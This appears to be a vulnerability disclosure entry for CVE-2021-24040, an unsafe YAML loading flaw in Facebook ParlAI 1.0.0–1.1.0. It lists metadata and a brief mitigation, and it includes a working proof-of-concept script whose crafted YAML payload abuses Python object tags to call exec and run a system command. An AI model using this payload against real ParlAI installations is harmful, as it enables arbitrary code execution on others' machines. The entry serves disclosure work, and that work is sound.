vendor:
ParlAI
by:
Abhiram V
9,8
CVSS
CRITICAL
YAML deserialization attack
502
CWE
Product Name: ParlAI
Affected Version From: 1.0.0
Affected Version To: 1.1.0
Patch Exists: YES
Related CWE: CVE-2021-24040
CPE: a:facebook:parlai:1.0.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2021
Facebook ParlAI 1.0.0 – Deserialization of Untrusted Data in parlai
ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Create the following PoC file (exploit.py): import os; from parlai.chat_service.utils import config; exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')"""; open('config.yml','w+').write(exploit); config.parse_configuration_file('config.yml'); Execute the python script ie, python3 exploit.py
Mitigation:
Ensure that the YAML files are not loaded from untrusted sources and that the YAML files are validated before loading.